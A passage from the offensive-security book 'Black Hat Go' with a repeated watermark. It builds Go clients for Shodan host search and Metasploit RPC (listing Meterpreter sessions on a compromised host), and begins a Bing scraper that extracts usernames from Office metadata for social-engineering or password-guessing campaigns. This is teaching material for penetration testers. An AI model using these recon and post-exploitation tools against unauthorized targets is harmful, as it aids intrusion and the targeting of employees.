occasionally offers discounted pricing, so monitor it closely if you want to save a few bucks. Now, get your API key from the site and set it as an environment vari- able. The following examples will work as-is only if you save your API key as the variable SHODAN_API_KEY. Refer to your operating system’s user manual, or better yet, look at Chapter 1 if you need help setting the variable. 前沿信安资讯阵地 公众号:i nf osrc 52 Chapter 3 Before working through the code, understand that this section demon- strates how to create a bare-bones implementation of a client—not a fully featured, comprehensive implementation. However, the basic scaffolding you’ll build now will allow you to easily extend the demonstrated code to implement other API calls as you may need. The client you build will implement two API calls: one to query sub- scription credit information and the other to search for hosts that contain a certain string. You use the latter call for identifying hosts; for example, ports or operating systems matching a certain product. Luckily, the Shodan API is straightforward, producing nicely structured JSON responses. This makes it a good starting point for learning API inter- action. Here is a high-level overview of the typical steps for preparing and building an API client: 1. Review the service’s API documentation. 2. Design a logical structure for the code in order to reduce complexity and repetition. 3. Define request or response types, as necessary, in Go. 4. Create helper functions and types to facilitate simple initialization, authentication, and communication to reduce verbose or repetitive logic. 5. Build the client that interacts with the API consumer functions and types. We won’t explicitly call out each step in this section, but you should use this list as a map to guide your development. Start by quickly reviewing the API documentation on Shodan’s website. The documentation is minimal but produces everything needed to create a client program. Designing the Project Structure When building an API client, you should structure it so that the function calls and logic stand alone. This allows you to reuse the implementation as a library in other projects. That way, you won’t have to reinvent the wheel in the future. Building for reusability slightly changes a project’s structure. For the Shodan example, here’s the project structure: $ tree github.com/blackhat-go/bhg/ch-3/shodan github.com/blackhat-go/bhg/ch-3/shodan |---cmd | |---shodan | |---main.go |---shodan |---api.go |---host.go |---shodan.go 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 53 The main.go file defines package main and is used primarily as a con- sumer of the API you’ll build; in this case, you use it primarily to interact with your client implementation. The files in the shodan directory—api.go, host.go, and shodan.go—define package shodan, which contains the types and functions necessary for com- munication to and from Shodan. This package will become your stand- alone library that you can import into various projects. Cleaning Up API Calls When you perused the Shodan API documentation, you may have noticed that every exposed function requires you to send your API key. Although you certainly can pass that value around to each consumer function you create, that repetitive task becomes tedious. The same can be said for either hardcoding or handling the base URL (https://api.shodan.io/). For example, defining your API functions, as in the following snippet, requires you to pass in the token and URL to each function, which isn’t very elegant: func APIInfo(token, url string) { --snip-- } func HostSearch(token, url string) { --snip-- } Instead, opt for a more idiomatic solution that allows you to save key- strokes while arguably making your code more readable. To do this, create a shodan.go file and enter the code in Listing 3-7. package shodan u const BaseURL = "https://api.shodan.io" v type Client struct { apiKey string } w func New(apiKey string) *Client { return &Client{apiKey: apiKey} } Listing 3-7: Shodan Client definition (/ch-3/shodan/shodan/shodan.go) The Shodan URL is defined as a constant value u; that way, you can easily access and reuse it within your implementing functions. If Shodan ever changes the URL of its API, you’ll have to make the change at only this one location in order to correct your entire codebase. Next, you define a Client struct, used for maintaining your API token across requests v. Finally, the code defines a New() helper function, taking the API token as input and creating and returning an initialized Client instance w. Now, rather than creating your API code as arbitrary functions, you create them as methods on the Client struct, which allows you to interrogate the instance 前沿信安资讯阵地 公众号:i nf osrc 54 Chapter 3 directly rather than relying on overly verbose function parameters. You can change your API function calls, which we’ll discuss momentarily, to the following: func (s *Client) APIInfo() { --snip-- } func (s *Client) HostSearch() { --snip-- } Since these are methods on the Client struct, you can retrieve the API key through s.apiKey and retrieve the URL through BaseURL. The only pre- requisite to calling the methods is that you create an instance of the Client struct first. You can do this with the New() helper function in shodan.go. Querying Your Shodan Subscription Now you’ll start the interaction with Shodan. Per the Shodan API documen- tation, the call to query your subscription plan information is as follows: https://api.shodan.io/api-info?key={YOUR_API_KEY} The response returned resembles the following structure. Obviously, the values will differ based on your plan details and remaining subscription credits. { "query_credits": 56, "scan_credits": 0, "telnet": true, "plan": "edu", "https": true, "unlocked": true, } First, in api.go, you’ll need to define a type that can be used to unmarshal the JSON response to a Go struct. Without it, you won’t be able to process or interrogate the response body. In this example, name the type APIInfo: type APIInfo struct { QueryCredits int `json:"query_credits"` ScanCredits int `json:"scan_credits"` Telnet bool `json:"telnet"` Plan string `json:"plan"` HTTPS bool `json:"https"` Unlocked bool `json:"unlocked"` } The awesomeness that is Go makes that structure and JSON alignment a joy. As shown in Chapter 1, you can use some great tooling to “automagically” parse JSON—populating the fields for you. For each exported type on the struct, you explicitly define the JSON element name with struct tags so you can ensure that data is mapped and parsed properly. 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 55 Next you need to implement the function in Listing 3-8, which makes an HTTP GET request to Shodan and decodes the response into your APIInfo struct: func (s *Client) APIInfo() (*APIInfo, error) { res, err := http.Get(fmt.Sprintf("%s/api-info?key=%s", BaseURL, s.apiKey))u if err != nil { return nil, err } defer res.Body.Close() var ret APIInfo if err := json.NewDecoder(res.Body).Decode(&ret)v; err != nil { return nil, err } return &ret, nil } Listing 3-8: Making an HTTP GET request and decoding the response (/ch-3/shodan /shodan/api.go) The implementation is short and sweet. You first issue an HTTP GET request to the /api-info resource u. The full URL is built using the BaseURL global constant and s.apiKey. You then decode the response into your APIInfo struct v and return it to the caller. Before writing code that utilizes this shiny new logic, build out a second, more useful API call—the host search—which you’ll add to host.go. The request and response, according to the API documentation, is as follows: https://api.shodan.io/shodan/host/search?key={YOUR_API_KEY}&query={query}&facets={facets} { "matches": [ { "os": null, "timestamp": "2014-01-15T05:49:56.283713", "isp": "Vivacom", "asn": "AS8866", "hostnames": [ ], "location": { "city": null, "region_code": null, "area_code": null, "longitude": 25, "country_code3": "BGR", "country_name": "Bulgaria", "postal_code": null, "dma_code": null, "country_code": "BG", "latitude": 43 }, "ip": 3579573318, "domains": [ ], 前沿信安资讯阵地 公众号:i nf osrc 56 Chapter 3 "org": "Vivacom", "data": "@PJL INFO STATUS CODE=35078 DISPLAY="Power Saver" ONLINE=TRUE", "port": 9100, "ip_str": "" }, --snip-- ], "facets": { "org": [ { "count": 286, "value": "Korea Telecom" }, --snip-- ] }, "total": 12039 } Compared to the initial API call you implemented, this one is signifi- cantly more complex. Not only does the request take multiple parameters, but the JSON response contains nested data and arrays. For the following implementation, you’ll ignore the facets option and data, and instead focus on performing a string-based host search to process only the matches element of the response. As you did before, start by building the Go structs to handle the response data; enter the types in Listing 3-9 into your host.go file. type HostLocation struct { City string `json:"city"` RegionCode string `json:"region_code"` AreaCode int `json:"area_code"` Longitude float32 `json:"longitude"` CountryCode3 string `json:"country_code3"` CountryName string `json:"country_name"` PostalCode string `json:"postal_code"` DMACode int `json:"dma_code"` CountryCode string `json:"country_code"` Latitude float32 `json:"latitude"` } type Host struct { OS string `json:"os"` Timestamp string `json:"timestamp"` ISP string `json:"isp"` ASN string `json:"asn"` Hostnames []string `json:"hostnames"` Location HostLocation `json:"location"` IP int64 `json:"ip"` Domains []string `json:"domains"` Org string `json:"org"` Data string `json:"data"` 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 57 Port int `json:"port"` IPString string `json:"ip_str"` } type HostSearch struct { Matches []Host `json:"matches"` } Listing 3-9: Host search response data types (/ch-3 /shodan/shodan/host.go) The code defines three types: HostSearch Used for parsing the matches array Host Represents a single matches element HostLocation Represents the location element within the host Notice that the types may not define all response fields. Go handles this elegantly, allowing you to define structures with only the JSON fields you care about. Therefore, our code will parse the JSON just fine, while reducing the length of your code by including only the fields that are most relevant to the example. To initialize and populate the struct, you’ll define the function in Listing 3-10, which is similar to the APIInfo() method you created in Listing 3-8. func (s *Client) HostSearch(q stringu) (*HostSearch, error) { res, err := http.Get( v fmt.Sprintf("%s/shodan/host/search?key=%s&query=%s", BaseURL, s.apiKey, q), ) if err != nil { return nil, err } defer res.Body.Close() var ret HostSearch if err := json.NewDecoder(res.Body).Decode(&ret)w; err != nil { return nil, err } return &ret, nil } Listing 3-10: Decoding the host search response body (/ch-3/shodan /shodan/host.go) The flow and logic is exactly like the APIInfo() method, except that you take the search query string as a parameter u, issue the call to the /shodan/host/search endpoint while passing the search term v, and decode the response into the HostSearch struct w. You repeat this process of structure definition and function implemen- tation for each API service you want to interact with. Rather than wasting precious pages here, we’ll jump ahead and show you the last step of the pro- cess: creating the client that uses your API code. 前沿信安资讯阵地 公众号:i nf osrc 58 Chapter 3 Creating a Client You’ll use a minimalistic approach to create your client: take a search term as a command line argument and then call the APIInfo() and HostSearch() methods, as in Listing 3-11. func main() { if len(os.Args) != 2 { log.Fatalln("Usage: shodan searchterm") } apiKey := os.Getenv("SHODAN_API_KEY")u s := shodan.New(apiKey)v info, err := s.APIInfo()w if err != nil { log.Panicln(err) } fmt.Printf( "Query Credits: %d\nScan Credits: %d\n\n", info.QueryCredits, info.ScanCredits) hostSearch, err := s.HostSearch(os.Args[1])x if err != nil { log.Panicln(err) } y for _, host := range hostSearch.Matches { fmt.Printf("%18s%8d\n", host.IPString, host.Port) } } Listing 3-11: Consuming and using the shodan package (/ch-3/shodan/cmd/shodan /main.go) Start by reading your API key from the SHODAN_API_KEY environment vari- able u. Then use that value to initialize a new Client struct v, s, subsequently using it to call your APIInfo() method w. Call the HostSearch() method, pass- ing in a search string captured as a command line argument x. Finally, loop through the results to display the IP and port values for those services match- ing the query string y. The following output shows a sample run, searching for the string tomcat: $ SHODAN_API_KEY=YOUR-KEY go run main.go tomcat Query Credits: 100 Scan Credits: 100 8081 8080 8081 8181 10000 --snip-- 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 59 You’ll want to add error handling and data validation to this project, but it serves as a good example for fetching and displaying Shodan data with your new API. You now have a working codebase that can be easily extended to support and test the other Shodan functions. Interacting with Metasploit Metasploit is a framework used to perform a variety of adversarial techniques, including reconnaissance, exploitation, command and control, persistence, lateral network movement, payload creation and delivery, privilege escala- tion, and more. Even better, the community version of the product is free, runs on Linux and macOS, and is actively maintained. Essential for any adversarial engagement, Metasploit is a fundamental tool used by penetra- tion testers, and it exposes a remote procedure call (RPC) API to allow remote interaction with its functionality. In this section, you’ll build a client that interacts with a remote Metasploit instance. Much like the Shodan code you built, the Metasploit client you develop won’t cover a comprehensive implementation of all available func- tionality. Rather, it will be the foundation upon which you can extend additional functionality as needed. We think you’ll find the implementation more complex than the Shodan example, making the Metasploit interac- tion a more challenging progression. Setting Up Your Environment Before you proceed with this section, download and install the Metasploit community edition if you don’t already have it. Start the Metasploit console as well as the RPC listener through the msgrpc module in Metasploit. Then set the server host—the IP on which the RPC server will listen—and a pass- word, as shown in Listing 3-12. $ msfconsole msf > load msgrpc Pass=s3cr3t ServerHost= [*] MSGRPC Service: [*] MSGRPC Username: msf [*] MSGRPC Password: s3cr3t [*] Successfully loaded plugin: msgrpc Listing 3-12: Starting Metasploit and the msgrpc server To make the code more portable and avoid hardcoding values, set the following environment variables to the values you defined for your RPC instance. This is similar to what you did for the Shodan API key used to interact with Shodan in “Creating a Client” on page 58. $ export MSFHOST= $ export MSFPASS=s3cr3t You should now have Metasploit and the RPC server running. 前沿信安资讯阵地 公众号:i nf osrc 60 Chapter 3 Because the details on exploitation and Metasploit use are beyond the scope of this book,1 let’s assume that through pure cunning and trickery you’ve already compromised a remote Windows system and you’ve leveraged Metasploit’s Meterpreter payload for advanced post-exploitation activities. Here, your efforts will instead focus on how you can remotely communicate with Metasploit to list and interact with established Meterpreter sessions. As we mentioned before, this code is a bit more cumbersome, so we’ll purposely pare it back to the bare minimum—just enough for you to take the code and extend it for your specific needs. Follow the same project roadmap as the Shodan example: review the Metasploit API, lay out the project in library format, define data types, imple- ment client API functions, and, finally, build a test rig that uses the library. First, review the Metasploit API developer documentation at Rapid7’s official website (https://metasploit.help.rapid7.com/docs/rpc-api/). The function- ality exposed is extensive, allowing you to do just about anything remotely that you could through local interaction. Unlike Shodan, which uses JSON, Metasploit communicates using MessagePack, a compact and efficient binary format. Because Go doesn’t contain a standard MessagePack package, you’ll use a full-featured community implementation. Install it by executing the following from the command line: $ go get gopkg.in/vmihailenco/msgpack.v2 In the code, you’ll refer to the implementation as msgpack. Don’t worry too much about the details of the MessagePack spec. You’ll see shortly that you’ll need to know very little about MessagePack itself to build a work- ing client. Go is great because it hides a lot of these details, allowing you to instead focus on business logic. What you need to know are the basics of annotating your type definitions in order to make them “MessagePack- friendly.” Beyond that, the code to initiate encoding and decoding is identi- cal to other formats, such as JSON and XML. Next, create your directory structure. For this example, you use only two Go files: $ tree github.com/blackhat-go/bhg/ch-3/metasploit-minimal github.com/blackhat-go/bhg/ch-3/metasploit-minimal |---client | |---main.go |---rpc |---msf.go The msf.go file resides within the rpc package, and you’ll use client/main.go to implement and test the library you build. 1. For assistance and practice with exploitation, consider downloading and running the Metasploitable virtual image, which contains several exploitable flaws useful for training purposes. 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 61 Defining Your Objective Now, you need to define your objective. For the sake of brevity, implement the code to interact and issue an RPC call that retrieves a listing of current Meterpreter sessions—that is, the session.list method from the Metasploit developer documentation. The request format is defined as follows: [ "session.list", "token" ] This is minimal; it expects to receive the name of the method to imple- ment and a token. The token value is a placeholder. If you read through the documentation, you’ll find that this is an authentication token, issued upon successful login to the RPC server. The response returned from Metasploit for the session.list method follows this format: { "1" => { 'type' => "shell", "tunnel_local" => "", "tunnel_peer" => "", "via_exploit" => "exploit/multi/handler", "via_payload" => "payload/windows/shell_reverse_tcp", "desc" => "Command shell", "info" => "", "workspace" => "Project1", "target_host" => "", "username" => "root", "uuid" => "hjahs9kw", "exploit_uuid" => "gcprpj2a", "routes" => [ ] } } This response is returned as a map: the Meterpreter session identifiers are the keys, and the session detail is the value. Let’s build the Go types to handle both the request and response data. Listing 3-13 defines the sessionListReq and SessionListRes. u type sessionListReq struct { v _msgpack struct{} `msgpack:",asArray"` Method string Token string } w type SessionListRes struct { ID uint32 `msgpack:",omitempty"`x Type string `msgpack:"type"` TunnelLocal string `msgpack:"tunnel_local"` TunnelPeer string `msgpack:"tunnel_peer"` ViaExploit string `msgpack:"via_exploit"` ViaPayload string `msgpack:"via_payload"` Description string `msgpack:"desc"` 前沿信安资讯阵地 公众号:i nf osrc 62 Chapter 3 Info string `msgpack:"info"` Workspace string `msgpack:"workspace"` SessionHost string `msgpack"session_host"` SessionPort int `msgpack"session_port"` Username string `msgpack:"username"` UUID string `msgpack:"uuid"` ExploitUUID string `msgpack:"exploit_uuid"` } Listing 3-13: Metasploit session list type definitions (/ch-3/metasploit-minimal/rpc/msf.go) You use the request type, sessionListReq u, to serialize structured data to the MessagePack format in a manner consistent with what the Metasploit RPC server expects—specifically, with a method name and token value. Notice that there aren’t any descriptors for those fields. The data is passed as an array, not a map, so rather than expecting data in key/value format, the RPC interface expects the data as a positional array of values. This is why you omit annotations for those properties—no need to define the key names. However, by default, a structure will be encoded as a map with the key names deduced from the property names. To disable this and force the encoding as a positional array, you add a special field named _msgpack that utilizes the asArray descriptor v, to explicitly instruct an encoder/decoder to treat the data as an array. The SessionListRes type w contains a one-to-one mapping between response field and struct properties. The data, as shown in the preceding example response, is essentially a nested map. The outer map is the session identifier to session details, while the inner map is the session details, repre- sented as key/value pairs. Unlike the request, the response isn’t structured as a positional array, but each of the struct properties uses descriptors to explicitly name and map the data to and from Metasploit’s representation. The code includes the session identifier as a property on the struct. However, because the actual value of the identifier is the key value, this will be popu- lated in a slightly different manner, so you include the omitempty descriptor x to make the data optional so that it doesn’t impact encoding or decoding. This flattens the data so you don’t have to work with nested maps. Retrieving a Valid Token Now, you have only one thing outstanding. You have to retrieve a valid token value to use for that request. To do so, you’ll issue a login request for the auth.login() API method, which expects the following: ["auth.login", "username", "password"] You need to replace the username and password values with what you used when loading the msfrpc module in Metasploit during initial setup (recall that you set them as environment variables). Assuming authentication is successful, the server responds with the following message, which contains an authentication token you can use for subsequent requests. 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 63 { "result" => "success", "token" => "a1a1a1a1a1a1a1a1" } An authentication failure produces the following response: { "error" => true, "error_class" => "Msf::RPC::Exception", "error_message" => "Invalid User ID or Password" } For good measure, let’s also create functionality to expire the token by logging out. The request takes the method name, the authentication token, and a third optional parameter that you’ll ignore because it’s unnecessary for this scenario: [ "auth.logout", "token", "logoutToken"] A successful response looks like this: { "result" => "success" } Defining Request and Response Methods Much as you structured the Go types for the session.list() method’s request and response, you need to do the same for both auth.login() and auth.logout() (see Listing 3-14). The same reasoning applies as before, using descriptors to force requests to be serialized as arrays and for the responses to be treated as maps: type loginReq struct { _msgpack struct{} `msgpack:",asArray"` Method string Username string Password string } type loginRes struct { Result string `msgpack:"result"` Token string `msgpack:"token"` Error bool `msgpack:"error"` ErrorClass string `msgpack:"error_class"` ErrorMessage string `msgpack:"error_message"` } type logoutReq struct { _msgpack struct{} `msgpack:",asArray"` Method string Token string LogoutToken string } 前沿信安资讯阵地 公众号:i nf osrc 64 Chapter 3 type logoutRes struct { Result string `msgpack:"result"` } Listing 3-14: Login and logout Metasploit type definition (/ch-3/metasploit-minimal/rpc /msf.go) It’s worth noting that Go dynamically serializes the login response, populating only the fields present, which means you can represent both successful and failed logins by using a single struct format. Creating a Configuration Struct and an RPC Method In Listing 3-15, you take the defined types and actually use them, creating the necessary methods to issue RPC commands to Metasploit. Much as in the Shodan example, you also define an arbitrary type for maintaining pertinent configuration and authentication information. That way, you won’t have to explicitly and repeatedly pass in common elements such as host, port, and authentication token. Instead, you’ll use the type and build methods on it so that data is implicitly available. type Metasploit struct { host string user string pass string token string } func New(host, user, pass string) *Metasploit { msf := &Metasploit{ host: host, user: user, pass: pass, } return msf } Listing 3-15: Metasploit client definition (/ch-3 /metasploit-minimal/rpc/msf.go) Now you have a struct and, for convenience, a function named New() that initializes and returns a new struct. Performing Remote Calls You can now build methods on your Metasploit type in order to perform the remote calls. To prevent extensive code duplication, in Listing 3-16, you start by building a method that performs the serialization, deserialization, and HTTP communication logic. Then you won’t have to include this logic in every RPC function you build. func (msf *Metasploit) send(req interface{}, res interface{})u error { buf := new(bytes.Buffer) 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 65 v msgpack.NewEncoder(buf).Encode(req) w dest := fmt.Sprintf("http://%s/api", msf.host) r, err := http.Post(dest, "binary/message-pack", buf)x if err != nil { return err } defer r.Body.Close() if err := msgpack.NewDecoder(r.Body).Decode(&res)y; err != nil { return err } return nil } Listing 3-16: Generic send() method with reusable serialization and deserialization (/ch-3/metasploit-minimal/rpc/msf.go) The send() method receives request and response parameters of type interface{} u. Using this interface type allows you to pass any request struct into the method, and subsequently serialize and send the request to the server. Rather than explicitly returning the response, you’ll use the res interface{} parameter to populate its data by writing a decoded HTTP response to its location in memory. Next, use the msgpack library to encode the request v. The logic to do this matches that of other standard, structured data types: first create an encoder via NewEncoder() and then call the Encode() method. This populates the buf variable with MessagePack-encoded representation of the request struct. Following the encoding, you build the destination URL by using the data within the Metasploit receiver, msf w. You use that URL and issue a POST request, explicitly setting the content type to binary/message-pack and setting the body to the serialized data x. Finally, you decode the response body y. As alluded to earlier, the decoded data is written to the memory location of the response interface that was passed into the method. The encoding and decoding of data is done without ever needing to explicitly know the request or response struct types, making this a flexible, reusable method. In Listing 3-17, you can see the meat of the logic in all its glory. func (msf *Metasploit) Login()u error { ctx := &loginReq{ Method: "auth.login", Username: msf.user, Password: msf.pass, } var res loginRes if err := msf.send(ctx, &res)v; err != nil { return err } msf.token = res.Token return nil } 前沿信安资讯阵地 公众号:i nf osrc 66 Chapter 3 func (msf *Metasploit) Logout()w error { ctx := &logoutReq{ Method: "auth.logout", Token: msf.token, LogoutToken: msf.token, } var res logoutRes if err := msf.send(ctx, &res)x; err != nil { return err } msf.token = "" return nil } func (msf *Metasploit) SessionList()y (map[uint32]SessionListRes, error) { req := &SessionListReq{Method: "session.list", Token: msf.token} z res := make(map[uint32]SessionListRes) if err := msf.send(req, &res){; err != nil { return nil, err } | for id, session := range res { session.ID = id res[id] = session } return res, nil } Listing 3-17: Metasploit API calls implementation (/ch-3/metasploit-minimal/rpc/msf.go) You define three methods: Login() u, Logout() w, and SessionList() y. Each method uses the same general flow: create and initialize a request struct, create the response struct, and call the helper function vx{ to send the request and receive the decoded response. The Login() and Logout() methods manipulate the token property. The only significant dif- ference between method logic appears in the SessionList() method, where you define the response as a map[uint32]SessionListRes z and loop over that response to flatten the map |, setting the ID property on the struct rather than maintaining a map of maps. Remember that the session.list() RPC function requires a valid authenti- cation token, meaning you have to log in before the SessionList() method call will succeed. Listing 3-18 uses the Metasploit receiver struct to access a token, which isn’t a valid value yet—it’s an empty string. Since the code you’re devel- oping here isn’t fully featured, you could just explicitly include a call to your Login() method from within the SessionList() method, but for each additional authenticated method you implement, you’d have to check for the existence of a valid authentication token and make an explicit call to Login(). This isn’t great coding practice because you’d spend a lot of time repeating logic that you could write, say, as part of a bootstrapping process. 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 67 You’ve already implemented a function, New(), designed to be used for bootstrapping, so patch up that function to see what a new implementa- tion looks like when including authentication as part of the process (see Listing 3-18). func New(host, user, pass string) (*Metasploit, error)u { msf := &Metasploit{ host: host, user: user, pass: pass, } if err := msf.Login()v; err != nil { return nil, err } return msf, nil } Listing 3-18: Initializing the client with embedding Metasploit login (/ch-3/metasploit -minimal/rpc/msf.go) The patched-up code now includes an error as part of the return value set u. This is to alert on possible authentication failures. Also, added to the logic is an explicit call to the Login() method v. As long as the Metasploit struct is instantiated using this New() function, your authenticated method calls will now have access to a valid authentication token. Creating a Utility Program Nearing the end of this example, your last effort is to create the utility pro- gram that implements your shiny new library. Enter the code in Listing 3-19 into client/main.go, run it, and watch the magic happen. package main import ( "fmt" "log" "github.com/blackhat-go/bhg/ch-3/metasploit-minimal/rpc" ) func main() { host := os.Getenv("MSFHOST") pass := os.Getenv("MSFPASS") user := "msf" if host == "" || pass == "" { log.Fatalln("Missing required environment variable MSFHOST or MSFPASS") } 前沿信安资讯阵地 公众号:i nf osrc 68 Chapter 3 msf, err := rpc.New(host, user, pass)u if err != nil { log.Panicln(err) } v defer msf.Logout() sessions, err := msf.SessionList()w if err != nil { log.Panicln(err) } fmt.Println("Sessions:") x for _, session := range sessions { fmt.Printf("%5d %s\n", session.ID, session.Info) } } Listing 3-19: Consuming our msfrpc package (/ch-3/metasploit-minimal/client/main.go) First, bootstrap the RPC client and initialize a new Metasploit struct u. Remember, you just updated this function to perform authentication dur- ing initialization. Next, ensure you do proper cleanup by issuing a deferred call to the Logout() method v. This will run when the main function returns or exits. You then issue a call to the SessionList() method w and iterate over that response to list out the available Meterpreter sessions x. That was a lot of code, but fortunately, implementing other API calls should be substantially less work since you’ll just be defining request and response types and building the library method to issue the remote call. Here’s sample output produced directly from our client utility, showing one established Meterpreter session: $ go run main.go Sessions: 1 WIN-HOME\jsmith @ WIN-HOME There you have it. You’ve successfully created a library and client util- ity to interact with a remote Metasploit instance to retrieve the available Meterpreter sessions. Next, you’ll venture into search engine response scraping and document metadata parsing. Parsing Document Metadata with Bing Scraping As we stressed in the Shodan section, relatively benign information—when viewed in the correct context—can prove to be critical, increasing the likeli- hood that your attack against an organization succeeds. Information such as employee names, phone numbers, email addresses, and client software versions are often the most highly regarded because they provide concrete 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 69 or actionable information that attackers can directly exploit or use to craft attacks that are more effective and highly targeted. One such source of information, popularized by a tool named FOCA, is document metadata. Applications store arbitrary information within the structure of a file saved to disk. In some cases, this can include geographical coordinates, application versions, operating system information, and usernames. Better yet, search engines contain advanced query filters that allow you to retrieve specific files for an organization. The remainder of this chapter focuses on building a tool that scrapes—or as my lawyer calls it, indexes—Bing search results to retrieve a target organization’s Microsoft Office documents, sub- sequently extracting relevant metadata. Setting Up the Environment and Planning Before diving into the specifics, we’ll start by stating the objectives. First, you’ll focus solely on Office Open XML documents—those ending in xlsx, docx, pptx, and so on. Although you could certainly include legacy Office data types, the binary formats make them exponentially more complicated, increasing code complexity and reducing readability. The same can be said for working with PDF files. Also, the code you develop won’t handle Bing pagination, instead only parsing initial page search results. We encourage you to build this into your working example and explore file types beyond Open XML. Why not just use the Bing Search APIs for building this, rather than doing HTML scraping? Because you already know how to build clients that interact with structured APIs. There are practical use cases for scrap- ing HTML pages, particularly when no API exists. Rather than rehashing what you already know, we’ll take this as an opportunity to introduce a new method of extracting data. You’ll use an excellent package, goquery, which mimics the functionality of jQuery, a JavaScript library that includes an intuitive syntax to traverse HTML documents and select data within. Start by installing goquery: $ go get github.com/PuerkitoBio/goquery Fortunately, that’s the only prerequisite software needed to complete the development. You’ll use standard Go packages to interact with Open XML files. These files, despite their file type suffix, are ZIP archives that, when extracted, contain XML files. The metadata is stored in two files within the docProps directory of the archive: $ unzip test.xlsx $ tree --snip-- |---docProps | |---app.xml | |---core.xml --snip— 前沿信安资讯阵地 公众号:i nf osrc 70 Chapter 3 The core.xml file contains the author information as well as modification details. It’s structured as follows: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata /core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <dc:creator>Dan Kottmann</dc:creator>u <cp:lastModifiedBy>Dan Kottmann</cp:lastModifiedBy>v <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-06T18:24:42Z</dcterms:created> <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-06T18:25:32Z</dcterms:modified> </cp:coreProperties> The creator u and lastModifiedBy v elements are of primary interest. These fields contain employee or usernames that you can use in a social- engineering or password-guessing campaign. The app.xml file contains details about the application type and version used to create the Open XML document. Here’s its structure: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"> <Application>Microsoft Excel</Application>u <DocSecurity>0</DocSecurity> <ScaleCrop>false</ScaleCrop> <HeadingPairs> <vt:vector size="2" baseType="variant"> <vt:variant> <vt:lpstr>Worksheets</vt:lpstr> </vt:variant> <vt:variant> <vt:i4>1</vt:i4> </vt:variant> </vt:vector> </HeadingPairs> <TitlesOfParts> <vt:vector size="1" baseType="lpstr"> <vt:lpstr>Sheet1</vt:lpstr> </vt:vector> </TitlesOfParts> <Company>ACME</Company>v <LinksUpToDate>false</LinksUpToDate> <SharedDoc>false</SharedDoc> <HyperlinksChanged>false</HyperlinksChanged> <AppVersion>15.0300</AppVersion>w </Properties> 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 71 You’re primarily interested in just a few of those elements: Application u, Company v, and AppVersion w. The version itself doesn’t obviously correlate to the Office version name, such as Office 2013, Office 2016, and so on, but a logical mapping does exist between that field and the more readable, com- monly known alternative. The code you develop will maintain this mapping. Defining the metadata Package In Listing 3-20, define the Go types that correspond to these XML datasets in a new package named metadata and put the code in a file named openxml .go—one type for each XML file you wish to parse. Then add a data map- ping and convenience function for determining the recognizable Office version that corresponds to the AppVersion. type OfficeCoreProperty struct { XMLName xml.Name `xml:"coreProperties"` Creator string `xml:"creator"` LastModifiedBy string `xml:"lastModifiedBy"` } type OfficeAppProperty struct { XMLName xml.Name `xml:"Properties"` Application string `xml:"Application"` Company string `xml:"Company"` Version string `xml:"AppVersion"` } var OfficeVersionsu = map[string]string{ "16": "2016", "15": "2013", "14": "2010", "12": "2007", "11": "2003", } func (a *OfficeAppProperty) GetMajorVersion()v string { tokens := strings.Split(a.Version, ".")w if len(tokens) < 2 { return "Unknown" } v, ok := OfficeVersionsx [tokens[0]] if !ok { return "Unknown" } return v } Listing 3-20: Open XML type definition and version mapping (/ch-3/bing-metadata /metadata/openxml.go) 前沿信安资讯阵地 公众号:i nf osrc 72 Chapter 3 After you define the OfficeCoreProperty and OfficeAppProperty types, define a map, OfficeVersions, that maintains a relationship of major version numbers to recognizable release years u. To use this map, define a method, GetMajorVersion(), on the OfficeAppProperty type v. The method splits the XML data’s AppVersion value to retrieve the major version number w, subsequently using that value and the OfficeVersions map to retrieve the release year x. Mapping the Data to Structs Now that you’ve built the logic and types to work with and inspect the XML data of interest, you can create the code that reads the appropriate files and assigns the contents to your structs. To do this, define NewProperties() and process() functions, as shown in Listing 3-21. func NewProperties(r *zip.Reader) (*OfficeCoreProperty, *OfficeAppProperty, error) {u var coreProps OfficeCoreProperty var appProps OfficeAppProperty for _, f := range r.File {v switch f.Name {w case "docProps/core.xml": if err := process(f, &coreProps)x; err != nil { return nil, nil, err } case "docProps/app.xml": if err := process(f, &appProps)y; err != nil { return nil, nil, err } default: continue } } return &coreProps, &appProps, nil } func process(f *zip.File, prop interface{}) error {z rc, err := f.Open() if err != nil { return err } defer rc.Close() if err := {xml.NewDecoder(rc).Decode(&prop); err != nil { return err } return nil } Listing 3-21: Processing Open XML archives and embedded XML documents (/ch-3/bing-metadata /metadata/openxml.go) 前沿信安资讯阵地 公众号:i nf osrc HTTP Clients and Remote Interaction with Tools 73 The NewProperties() function accepts a *zip.Reader, which represents an io.Reader for ZIP archives u. Using the zip.Reader instance, iterate through all the files in the archive v, checking the filenames w. If a filename matches one of the two property filenames, call the process() function xy, passing in the file and the arbitrary structure type you wish to populate—either OfficeCoreProperty or OfficeAppProperty. The process() function accepts two parameters: a *zip.File and an interface{} z. Similar to the Metasploit tool you developed, this code accepts a generic interface{} type to allow for the file contents to be assigned into any data type. This increases code reuse because there’s nothing type-specific within the process() function. Within the function, the code reads the contents of the file and unmarshals the XML data into the struct {. Searching and Receiving Files with Bing You now have all the code necessary to open, read, parse, and extract Office Open XML documents, and you know what you need to do with the file. Now, you need to figure out how to search for 